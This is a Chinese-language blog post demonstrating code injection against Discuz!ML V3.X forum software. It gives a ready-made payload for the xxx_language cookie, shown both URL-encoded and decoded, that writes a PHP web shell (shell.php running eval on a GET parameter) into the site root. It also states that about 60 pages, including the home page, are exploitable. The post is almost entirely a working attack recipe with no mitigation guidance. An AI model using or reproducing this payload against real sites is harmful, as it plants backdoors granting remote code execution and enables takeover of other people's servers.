Discuz!ML V3.X 代码注入利用过程

  • 内容
  • 相关

Discuz!ML官网下载:http://discuz.ml/download

我下的是官网最新版x3.4。

Image

大约共有60多个页面可以利用,包含论坛主页。

Image

GET一下然后找到cookie里面的xxx_language参数,将xxx_language的值改为exp的内容,然后提交并返回200。

exp:

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522ss%2522%255d%29%253b%253f%253e%27%29%29.%27

解码:

'. file_put_contents('shell.php',urldecode('<?php  eval($_GET["ss"]);?>')).'

Image

访问主页后,根目录下会生成一个shell.php文件。

Image

利用成功

Image

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:Discuz!ML V3.X 代码注入利用过程 - http://www.shungg.cn/post/242

发表评论

电子邮件地址不会被公开。 必填项已用*标注